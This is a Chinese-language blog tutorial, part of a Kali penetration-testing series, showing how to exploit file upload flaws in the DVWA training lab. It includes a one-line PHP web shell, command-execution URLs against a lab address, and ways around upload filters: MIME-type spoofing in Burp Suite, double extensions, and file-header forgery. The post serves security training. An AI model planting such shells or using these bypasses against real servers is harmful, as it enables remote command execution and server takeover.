Kali渗透测试(七)—— DVWA文件上传漏洞利用

15 篇文章 5 订阅

Kali linux渗透测试—— 文件上传

一. 简介
上传的文件对应用程序构成了重大风险。 许多攻击的第一步是向要攻击的系统获取一些代码。 然后,攻击仅需要找到一种方法来执行代码。 使用文件上传可帮助攻击者完成第一步。
无限制文件上传的后果可能会有所不同,包括完整的系统接管,文件系统过载,将攻击转发到后端系统以及简单的破坏。 这取决于应用程序如何处理上传的文件,包括文件的存储位置。

主要利用方式
1.直接上传 webshell
2.修改文件类型上传 webshell:mimetype 文件头、扩展名
3.修改扩展名上传 webshell:静态解析文件扩展名可能无法执行
4.文件头绕过过滤文件上传 webshell
5.防御措施:删除目录执行权限增加安全性

二.测试
1.测试 dvwa low 安全级别,从源代码看这个级别没有任何防护,可以上传任意文件
在这里插入图片描述
测试:上传一个简单的木马 1.php文件

<?php
	echo shell_exec($_GET['cmd']);
?>

在这里插入图片描述
上传成功,到这个目录下执行任意命令即可如pwd
http://192.168.10.136/dvwa/hackable/uploads/1.php?cmd=pwd
命令执行成功
在这里插入图片描述2.测试dvwa medium 级别,可以看到对文件类型和大小做了限制
在这里插入图片描述
启用Burpsuite修改文件类型为image/jpeg即可
在这里插入图片描述
ok上传成功
在这里插入图片描述3.high 级别,按照文件真实扩展名判断,也可以绕过
在这里插入图片描述
修改文件名和类型
在这里插入图片描述

测试一下,ok
192.168.10.136/dvwa/hackable/uploads/1.php.jpg?cmd=ls在这里插入图片描述
还有种方式,先随便上传一个图片抓包截断修改内容如下,防止系统对文件头做检验
在这里插入图片描述
测试一下,也ok吼吼吼吼吼
在这里插入图片描述

在这里插入图片描述

  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bulldozer++

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值